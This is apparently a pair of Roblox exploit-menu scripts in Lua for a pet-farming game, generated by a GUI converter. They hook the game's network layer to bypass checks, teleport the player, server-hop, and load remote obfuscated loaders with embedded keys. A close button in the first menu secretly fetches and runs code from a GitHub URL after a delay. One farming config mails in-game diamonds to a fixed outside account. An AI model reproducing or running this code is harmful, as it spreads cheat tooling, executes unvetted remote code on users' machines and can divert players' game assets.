-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local Frame_2 = Instance.new("Frame")
local TextButton = Instance.new("TextButton")
local TitleRed = Instance.new("TextLabel")
local TitleRed_2 = Instance.new("TextLabel")
local TitleRed_3 = Instance.new("TextLabel")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
Frame.BorderColor3 = Color3.fromRGB(72, 72, 72)
Frame.Position = UDim2.new(0.248854771, 0, -0.0251980219, 0)
Frame.Size = UDim2.new(0, 495, 0, 403)

Frame_2.Parent = Frame
Frame_2.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
Frame_2.BorderColor3 = Color3.fromRGB(153, 153, 153)
Frame_2.Position = UDim2.new(0.00606036, 0, 0.0124069452, 0)
Frame_2.Size = UDim2.new(0, 486, 0, 392)

TextButton.Parent = Frame
TextButton.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
TextButton.BorderColor3 = Color3.fromRGB(27, 27, 27)
TextButton.Position = UDim2.new(0.406294793, 0, 0.846463382, 0)
TextButton.Size = UDim2.new(0, 91, 0, 91)
TextButton.Font = Enum.Font.LuckiestGuy
TextButton.Text = "X"
TextButton.TextColor3 = Color3.fromRGB(255, 0, 0)
TextButton.TextSize = 80.000
TextButton.TextYAlignment = Enum.TextYAlignment.Bottom

TitleRed.Name = "TitleRed"
TitleRed.Parent = TextButton
TitleRed.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
TitleRed.BorderColor3 = Color3.fromRGB(27, 27, 27)
TitleRed.Position = UDim2.new(-1.73323417, 0, -3.64705539, 0)
TitleRed.Size = UDim2.new(0, 401, 0, 161)
TitleRed.Font = Enum.Font.GothamBold
TitleRed.Text = "Check Kutson please, masmabilis magfarm pag magisa, Result: mas mabilis ka ding matatapos."
TitleRed.TextColor3 = Color3.fromRGB(255, 255, 255)
TitleRed.TextSize = 30.000
TitleRed.TextStrokeColor3 = Color3.fromRGB(37, 29, 255)
TitleRed.TextStrokeTransparency = 0.000
TitleRed.TextWrapped = true

TitleRed_2.Name = "TitleRed"
TitleRed_2.Parent = TextButton
TitleRed_2.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
TitleRed_2.BorderColor3 = Color3.fromRGB(27, 27, 27)
TitleRed_2.Position = UDim2.new(-1.73323417, 0, -1.69101083, 0)
TitleRed_2.Size = UDim2.new(0, 418, 0, 122)
TitleRed_2.Font = Enum.Font.GothamBold
TitleRed_2.Text = "Check mo din ung kutson nyo  bahay, baka may gumagamit na iba sa asawa mo pagwala ka ng dose oras"
TitleRed_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TitleRed_2.TextSize = 30.000
TitleRed_2.TextStrokeColor3 = Color3.fromRGB(37, 29, 255)
TitleRed_2.TextStrokeTransparency = 0.000
TitleRed_2.TextWrapped = true

TitleRed_3.Name = "TitleRed"
TitleRed_3.Parent = TextButton
TitleRed_3.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
TitleRed_3.BorderColor3 = Color3.fromRGB(27, 27, 27)
TitleRed_3.Position = UDim2.new(1.68434823, 0, -0.174527377, 0)
TitleRed_3.Size = UDim2.new(0, 83, 0, 23)
TitleRed_3.Font = Enum.Font.GothamBold
TitleRed_3.Text = "except jackie"
TitleRed_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TitleRed_3.TextSize = 10.000
TitleRed_3.TextStrokeColor3 = Color3.fromRGB(37, 29, 255)
TitleRed_3.TextWrapped = true

-- Scripts:

local function TPJNAD_fake_script() -- Frame.Drag 
	local script = Instance.new('LocalScript', Frame)

	script.Parent.Active = true
	script.Parent.Draggable = true
end
coroutine.wrap(TPJNAD_fake_script)()
local function OBASE_fake_script() -- TextButton.quitbutton 
	local script = Instance.new('Script', TextButton)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Visible = false
		wait(180)
		loadstring(game:HttpGet("https://raw.githubusercontent.com/bytemoo/Team/main/GrayArea"))()
		game:GetService("RunService"):Set3dRenderingEnabled(false)
	end)
end
coroutine.wrap(OBASE_fake_script)()

-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local Frame_2 = Instance.new("Frame")
local BankSpawn = Instance.new("TextButton")
local MilkupScript = Instance.new("TextButton")
local PixelVault = Instance.new("TextButton")
local MailSpawn = Instance.new("TextButton")
local TextButton = Instance.new("TextButton")
local TitleRed = Instance.new("TextLabel")
local Frame_3 = Instance.new("Frame")
local TextButton_2 = Instance.new("TextButton")
local TitleRed_2 = Instance.new("TextLabel")
local Frame_4 = Instance.new("Frame")
local Serverhop = Instance.new("TextButton")
local whiteoff = Instance.new("TextButton")
local whiteon = Instance.new("TextButton")
local collapse = Instance.new("TextButton")
local Silva = Instance.new("TextButton")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
Frame.BorderColor3 = Color3.fromRGB(72, 72, 72)
Frame.Position = UDim2.new(0.825268209, 0, 0.670123518, 0)
Frame.Size = UDim2.new(0, 141, 0, 159)

Frame_2.Parent = Frame
Frame_2.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
Frame_2.BorderColor3 = Color3.fromRGB(153, 153, 153)
Frame_2.Position = UDim2.new(0.0270922687, 0, 0.209999979, 0)
Frame_2.Size = UDim2.new(0, 133, 0, 119)

BankSpawn.Name = "Bank Spawn"
BankSpawn.Parent = Frame_2
BankSpawn.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
BankSpawn.Position = UDim2.new(0.0329999998, 0, 0.535000026, 0)
BankSpawn.Size = UDim2.new(0, 125, 0, 24)
BankSpawn.Font = Enum.Font.LuckiestGuy
BankSpawn.Text = "Pixel Bank"
BankSpawn.TextColor3 = Color3.fromRGB(0, 0, 0)
BankSpawn.TextSize = 16.000
BankSpawn.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)
BankSpawn.TextStrokeTransparency = 0.000
BankSpawn.TextWrapped = true

MilkupScript.Name = "Milkup Script"
MilkupScript.Parent = Frame_2
MilkupScript.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
MilkupScript.Position = UDim2.new(0.0329999998, 0, 0.280000001, 0)
MilkupScript.Size = UDim2.new(0, 125, 0, 24)
MilkupScript.Font = Enum.Font.LuckiestGuy
MilkupScript.Text = "Milkup script"
MilkupScript.TextColor3 = Color3.fromRGB(0, 0, 0)
MilkupScript.TextSize = 16.000
MilkupScript.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)
MilkupScript.TextStrokeTransparency = 0.000
MilkupScript.TextWrapped = true

PixelVault.Name = "PixelVault"
PixelVault.Parent = Frame_2
PixelVault.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
PixelVault.Position = UDim2.new(0.0329999998, 0, 0.0299999993, 0)
PixelVault.Size = UDim2.new(0, 125, 0, 24)
PixelVault.Font = Enum.Font.LuckiestGuy
PixelVault.Text = "Pixel Vault"
PixelVault.TextColor3 = Color3.fromRGB(0, 0, 0)
PixelVault.TextSize = 18.000
PixelVault.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)
PixelVault.TextStrokeTransparency = 0.000
PixelVault.TextWrapped = true

MailSpawn.Name = "Mail Spawn"
MailSpawn.Parent = Frame_2
MailSpawn.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
MailSpawn.Position = UDim2.new(0.0329999998, 0, 0.779999971, 0)
MailSpawn.Size = UDim2.new(0, 125, 0, 24)
MailSpawn.Font = Enum.Font.LuckiestGuy
MailSpawn.Text = "Pixel Mail"
MailSpawn.TextColor3 = Color3.fromRGB(0, 0, 0)
MailSpawn.TextSize = 16.000
MailSpawn.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)
MailSpawn.TextStrokeTransparency = 0.000
MailSpawn.TextWrapped = true

TextButton.Parent = Frame
TextButton.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton.Position = UDim2.new(0.867594123, 0, 0.0611653849, 0)
TextButton.Size = UDim2.new(0, 11, 0, 13)
TextButton.Font = Enum.Font.LuckiestGuy
TextButton.Text = "X"
TextButton.TextColor3 = Color3.fromRGB(255, 0, 0)
TextButton.TextSize = 14.000

TitleRed.Name = "TitleRed"
TitleRed.Parent = TextButton
TitleRed.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
TitleRed.BorderColor3 = Color3.fromRGB(27, 27, 27)
TitleRed.Position = UDim2.new(-8.63457203, 0, -0.0442670286, 0)
TitleRed.Size = UDim2.new(0, 77, 0, 14)
TitleRed.Font = Enum.Font.GothamBold
TitleRed.Text = "Games"
TitleRed.TextColor3 = Color3.fromRGB(255, 0, 0)
TitleRed.TextSize = 18.000

Frame_3.Parent = ScreenGui
Frame_3.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
Frame_3.BorderColor3 = Color3.fromRGB(72, 72, 72)
Frame_3.Position = UDim2.new(0.0771411657, 0, 0.332425475, 0)
Frame_3.Size = UDim2.new(0, 122, 0, 190)

TextButton_2.Parent = Frame_3
TextButton_2.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
TextButton_2.BorderColor3 = Color3.fromRGB(27, 27, 27)
TextButton_2.Position = UDim2.new(0.867426813, 0, 0.0326560177, 0)
TextButton_2.Size = UDim2.new(0, 11, 0, 13)
TextButton_2.Font = Enum.Font.LuckiestGuy
TextButton_2.Text = "X"
TextButton_2.TextColor3 = Color3.fromRGB(255, 0, 0)
TextButton_2.TextSize = 14.000

TitleRed_2.Name = "TitleRed"
TitleRed_2.Parent = Frame_3
TitleRed_2.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
TitleRed_2.BorderColor3 = Color3.fromRGB(27, 27, 27)
TitleRed_2.Position = UDim2.new(0.183609754, 0, 0.0326560624, 0)
TitleRed_2.Size = UDim2.new(0, 77, 0, 14)
TitleRed_2.Font = Enum.Font.GothamBold
TitleRed_2.Text = "Bytemoo"
TitleRed_2.TextColor3 = Color3.fromRGB(255, 0, 0)
TitleRed_2.TextSize = 18.000

Frame_4.Parent = Frame_3
Frame_4.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
Frame_4.BorderColor3 = Color3.fromRGB(153, 153, 153)
Frame_4.Position = UDim2.new(0.0343357772, 0, 0.138729006, 0)
Frame_4.Size = UDim2.new(0, 113, 0, 160)

Serverhop.Name = "Serverhop"
Serverhop.Parent = Frame_4
Serverhop.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
Serverhop.Position = UDim2.new(0.0599999987, 0, 0.829999983, 0)
Serverhop.Size = UDim2.new(0, 100, 0, 26)
Serverhop.Font = Enum.Font.LuckiestGuy
Serverhop.Text = "ServerHop"
Serverhop.TextColor3 = Color3.fromRGB(0, 0, 0)
Serverhop.TextSize = 17.000
Serverhop.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)
Serverhop.TextStrokeTransparency = 0.000
Serverhop.TextWrapped = true
Serverhop.TextYAlignment = Enum.TextYAlignment.Bottom

whiteoff.Name = "whiteoff"
whiteoff.Parent = Frame_4
whiteoff.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
whiteoff.Position = UDim2.new(0.0599999987, 0, 0.629999995, 0)
whiteoff.Size = UDim2.new(0, 100, 0, 26)
whiteoff.Font = Enum.Font.LuckiestGuy
whiteoff.Text = "White Off"
whiteoff.TextColor3 = Color3.fromRGB(0, 0, 0)
whiteoff.TextSize = 18.000
whiteoff.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)
whiteoff.TextStrokeTransparency = 0.000
whiteoff.TextWrapped = true
whiteoff.TextYAlignment = Enum.TextYAlignment.Bottom

whiteon.Name = "whiteon"
whiteon.Parent = Frame_4
whiteon.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
whiteon.Position = UDim2.new(0.0599999987, 0, 0.430000007, 0)
whiteon.Size = UDim2.new(0, 100, 0, 26)
whiteon.Font = Enum.Font.LuckiestGuy
whiteon.Text = "White On"
whiteon.TextColor3 = Color3.fromRGB(0, 0, 0)
whiteon.TextSize = 18.000
whiteon.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)
whiteon.TextStrokeTransparency = 0.000
whiteon.TextWrapped = true
whiteon.TextYAlignment = Enum.TextYAlignment.Bottom

collapse.Name = "collapse"
collapse.Parent = Frame_4
collapse.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
collapse.Position = UDim2.new(0.0599999987, 0, 0.0299999993, 0)
collapse.Size = UDim2.new(0, 100, 0, 26)
collapse.Font = Enum.Font.LuckiestGuy
collapse.Text = "Collapse"
collapse.TextColor3 = Color3.fromRGB(0, 0, 0)
collapse.TextSize = 18.000
collapse.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)
collapse.TextStrokeTransparency = 0.000
collapse.TextWrapped = true
collapse.TextYAlignment = Enum.TextYAlignment.Bottom

Silva.Name = "Silva"
Silva.Parent = Frame_4
Silva.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
Silva.Position = UDim2.new(0.0599999987, 0, 0.230000004, 0)
Silva.Size = UDim2.new(0, 100, 0, 25)
Silva.Font = Enum.Font.LuckiestGuy
Silva.Text = "Silva"
Silva.TextColor3 = Color3.fromRGB(0, 0, 0)
Silva.TextSize = 18.000
Silva.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)
Silva.TextStrokeTransparency = 0.000
Silva.TextWrapped = true
Silva.TextYAlignment = Enum.TextYAlignment.Bottom

-- Scripts:

local function VPQTF_fake_script() -- Frame.Drag 
	local script = Instance.new('LocalScript', Frame)

	script.Parent.Active = true
	script.Parent.Draggable = true
end
coroutine.wrap(VPQTF_fake_script)()
local function HDMELK_fake_script() -- BankSpawn.Bank Spawn 
	local script = Instance.new('Script', BankSpawn)

	script.Parent.MouseButton1Click:Connect(function()
		local Library = require(game:GetService("ReplicatedStorage").Library)
		local Network = require(game:GetService("ReplicatedStorage").Library.Client.Network)
		local Fire, Invoke = Network.Fire, Network.Invoke
		local old
		old = hookfunction(getupvalue(Fire, 1), function(...)
			return true
		end)
	
	
	
		function TeleportToWorld(world, area)
			Library.WorldCmds.Load(world)
			wait(0.25)
			local areaTeleport = Library.WorldCmds.GetMap().Teleports:FindFirstChild(area)
			Library.Signal.Fire("Teleporting")
			task.wait(0.25)
			local Character = game.Players.LocalPlayer.Character
			local Humanoid = Character.Humanoid
			local HumanoidRootPart = Character.HumanoidRootPart
			Character:PivotTo(areaTeleport.CFrame +
				areaTeleport.CFrame.UpVector * (Humanoid.HipHeight + HumanoidRootPart.Size.Y / 2))
			Library.Network.Fire("Performed Teleport", area)
			task.wait(0.25)
		end
	
	
	
	
		TeleportToWorld("Pixel", "Pixel Forest")
		task.wait(1)
		local a = game.Players.LocalPlayer.Character.HumanoidRootPart
		a.CFrame = CFrame.new(4471, -16, 2340)
	end)
end
coroutine.wrap(HDMELK_fake_script)()
local function HBWHU_fake_script() -- MilkupScript.Milkup Script 
	local script = Instance.new('Script', MilkupScript)

	script.Parent.MouseButton1Click:Connect(function()
		script_key="vOwThXUrdytWYVEOBafxIzDDSoZEqSQo";
		loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/fc715fb43902af268c335a5c7269be5e.lua"))()
	
	end)
end
coroutine.wrap(HBWHU_fake_script)()
local function PXKQ_fake_script() -- PixelVault.PixelVault 
	local script = Instance.new('Script', PixelVault)

	script.Parent.MouseButton1Click:Connect(function()
		local Library = require(game:GetService("ReplicatedStorage").Library)
		local Network = require(game:GetService("ReplicatedStorage").Library.Client.Network)
		local Fire, Invoke = Network.Fire, Network.Invoke
		local old
		old = hookfunction(getupvalue(Fire, 1), function(...)
			return true
		end)
	
	
		function TeleportToWorld(world, area)
			Library.WorldCmds.Load(world)
			wait(0.25)
			local areaTeleport = Library.WorldCmds.GetMap().Teleports:FindFirstChild(area)
			Library.Signal.Fire("Teleporting")
			task.wait(0.25)
			local Character = game.Players.LocalPlayer.Character
			local Humanoid = Character.Humanoid
			local HumanoidRootPart = Character.HumanoidRootPart
			Character:PivotTo(areaTeleport.CFrame +
				areaTeleport.CFrame.UpVector * (Humanoid.HipHeight + HumanoidRootPart.Size.Y / 2))
			Library.Network.Fire("Performed Teleport", area)
			task.wait(0.25)
		end
	
		wait(10)
		function Teleport(x, y, z)
			local character = game:GetService("Players").LocalPlayer.Character or
				game:GetService("Players").LocalPlayer.CharacterAdded:Wait()
			local humanoid = character:WaitForChild("Humanoid")
			local humanoidRootPart = character:WaitForChild("HumanoidRootPart")
			CurrentPosition = character:WaitForChild("HumanoidRootPart").CFrame
			task.wait()
	
			humanoidRootPart.CFrame = CFrame.new(x, y, z)
		end
	
	
		local function create_platform(x, y, z)
			local p = Instance.new("Part")
			p.Anchored = true
			p.Name = "plat"
			p.Position = Vector3.new(x, y, z)
			p.Size = Vector3.new(10, 1, 10)
			p.Parent = game.Workspace
		end
	
	
		TeleportToWorld("Pixel", "Pixel Vault")
		create_platform(3500.14, -38, 2456.29)
	
		task.wait(0.1)
	
		Teleport(3500.14, -35, 2456.29)
	end)
end
coroutine.wrap(PXKQ_fake_script)()
local function AMQUGL_fake_script() -- MailSpawn.Mail Spawn 
	local script = Instance.new('Script', MailSpawn)

	script.Parent.MouseButton1Click:Connect(function()
		local Library = require(game:GetService("ReplicatedStorage").Library)
		local Network = require(game:GetService("ReplicatedStorage").Library.Client.Network)
		local Fire, Invoke = Network.Fire, Network.Invoke
		local old
		old = hookfunction(getupvalue(Fire, 1), function(...)
			return true
		end)
	
	
	
		function TeleportToWorld(world, area)
			Library.WorldCmds.Load(world)
			wait(0.25)
			local areaTeleport = Library.WorldCmds.GetMap().Teleports:FindFirstChild(area)
			Library.Signal.Fire("Teleporting")
			task.wait(0.25)
			local Character = game.Players.LocalPlayer.Character
			local Humanoid = Character.Humanoid
			local HumanoidRootPart = Character.HumanoidRootPart
			Character:PivotTo(areaTeleport.CFrame +
				areaTeleport.CFrame.UpVector * (Humanoid.HipHeight + HumanoidRootPart.Size.Y / 2))
			Library.Network.Fire("Performed Teleport", area)
			task.wait(0.25)
		end
	
	
	
	
		TeleportToWorld("Pixel", "Pixel Forest")
		task.wait(0.1)
		local a = game.Players.LocalPlayer.Character.HumanoidRootPart
		a.CFrame = CFrame.new(4434, -16, 2341)
	end)
end
coroutine.wrap(AMQUGL_fake_script)()
local function JUALO_fake_script() -- TextButton.quitbutton 
	local script = Instance.new('Script', TextButton)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Visible = false
	end)
end
coroutine.wrap(JUALO_fake_script)()
local function ORRDKWF_fake_script() -- Frame_3.Drag 
	local script = Instance.new('LocalScript', Frame_3)

	script.Parent.Active = true
	script.Parent.Draggable = true
end
coroutine.wrap(ORRDKWF_fake_script)()
local function OFMB_fake_script() -- TextButton_2.quitbutton 
	local script = Instance.new('Script', TextButton_2)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Visible = false
	end)
end
coroutine.wrap(OFMB_fake_script)()
local function NQOOC_fake_script() -- Serverhop.serverhop 
	local script = Instance.new('Script', Serverhop)

	script.Parent.MouseButton1Click:Connect(function()
		local PlaceID = game.PlaceId
		local AllIDs = {}
		local foundAnything = ""
		local actualHour = os.date("!*t").hour
		local Deleted = false
		local File = pcall(function()
			AllIDs = game:GetService('HttpService'):JSONDecode(readfile("NotSameServers.json"))
		end)
		if not File then
			table.insert(AllIDs, actualHour)
			writefile("NotSameServers.json", game:GetService('HttpService'):JSONEncode(AllIDs))
		end
		function TPReturner()
			local Site;
			if foundAnything == "" then
				Site = game.HttpService:JSONDecode(game:HttpGet('https://games.roblox.com/v1/games/' .. PlaceID .. '/servers/Public?sortOrder=Asc&limit=100'))
			else
				Site = game.HttpService:JSONDecode(game:HttpGet('https://games.roblox.com/v1/games/' .. PlaceID .. '/servers/Public?sortOrder=Asc&limit=100&cursor=' .. foundAnything))
			end
			local ID = ""
			if Site.nextPageCursor and Site.nextPageCursor ~= "null" and Site.nextPageCursor ~= nil then
				foundAnything = Site.nextPageCursor
			end
			local num = 0;
			for i,v in pairs(Site.data) do
				local Possible = true
				ID = tostring(v.id)
				if tonumber(v.maxPlayers) > tonumber(v.playing) then
					for _,Existing in pairs(AllIDs) do
						if num ~= 0 then
							if ID == tostring(Existing) then
								Possible = false
							end
						else
							if tonumber(actualHour) ~= tonumber(Existing) then
								local delFile = pcall(function()
									delfile("NotSameServers.json")
									AllIDs = {}
									table.insert(AllIDs, actualHour)
								end)
							end
						end
						num = num + 1
					end
					if Possible == true then
						table.insert(AllIDs, ID)
						wait()
						pcall(function()
							writefile("NotSameServers.json", game:GetService('HttpService'):JSONEncode(AllIDs))
							wait()
							game:GetService("TeleportService"):TeleportToPlaceInstance(PlaceID, ID, game.Players.LocalPlayer)
						end)
						wait(4)
					end
				end
			end
		end
	
		function Teleport()
			while wait() do
				pcall(function()
					TPReturner()
					if foundAnything ~= "" then
						TPReturner()
					end
				end)
			end
		end
	
		-- If you'd like to use a script before server hopping (Like a Automatic Chest collector you can put the Teleport() after it collected everything.
		Teleport()
	end)
end
coroutine.wrap(NQOOC_fake_script)()
local function JLDA_fake_script() -- whiteoff.whiteoff 
	local script = Instance.new('Script', whiteoff)

	script.Parent.MouseButton1Click:Connect(function()
	
		game:GetService("RunService"):Set3dRenderingEnabled(true)
	end)
end
coroutine.wrap(JLDA_fake_script)()
local function BRYSSA_fake_script() -- whiteon.whiteon 
	local script = Instance.new('Script', whiteon)

	script.Parent.MouseButton1Click:Connect(function()
		game:GetService("RunService"):Set3dRenderingEnabled(false)
	end)
end
coroutine.wrap(BRYSSA_fake_script)()
local function BFMIZG_fake_script() -- collapse.BankSpawn 
	local script = Instance.new('Script', collapse)

	script.Parent.MouseButton1Click:Connect(function()
		local a = game.Players.LocalPlayer.Character.HumanoidRootPart
		a.CFrame = CFrame.new(253, 101, 56)
	end)
end
coroutine.wrap(BFMIZG_fake_script)()
local function DRYVWCW_fake_script() -- Silva.Silva 
	local script = Instance.new('Script', Silva)

	script.Parent.MouseButton1Click:Connect(function()
		script_key="TvFnXUnYUFoBGJhBmBcPJwyicsFBOfGj";
		Configs = {
			MysticMine = {
				["Giant Chest"] = true,
				["Diamonds"] = true
			},
			CyberCavern = {
				["Giant Chest"] = false,
				["Diamonds"] = false
			},
			ParadiseCave = {
				["Diamonds"] = false
			},
			Farming = {
				["Pet Sending"] = "Single",
				["Auto Orbs"] = true,
				["Auto Lootbags"] = true
			},
			Fruits = {
				["Minimum Fruits"] = 10,
				["Maximum Fruits"] = 20,
				["Enabled"] = true
			},
			Boosts = {
				["Triple Server Damage"] = false,
				["Triple Damage"] = true
			},
			Webhooks = {
				["Webhook Url"] = "Your Wbehook Url",
				["Time Frame"] = 60
			},
			Mailbox = {
				["Recipient"] = "jl_465", 
				["Minimum Diamonds"] = 50000000000, 
				["Enabled"] = true
			},
			Performance = {
				["Disable Orb Rendering"] = true,
				["Disable Lootbags"] = true,
				["Disable 3D Rendering"] = false,
				["Hide Username"] = false,
				["FPSCap"] = 60
			}
		}
		loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/21b86b12222bd279cbf3d0aa61d8c701.lua"))()
	end)
end
coroutine.wrap(DRYVWCW_fake_script)()
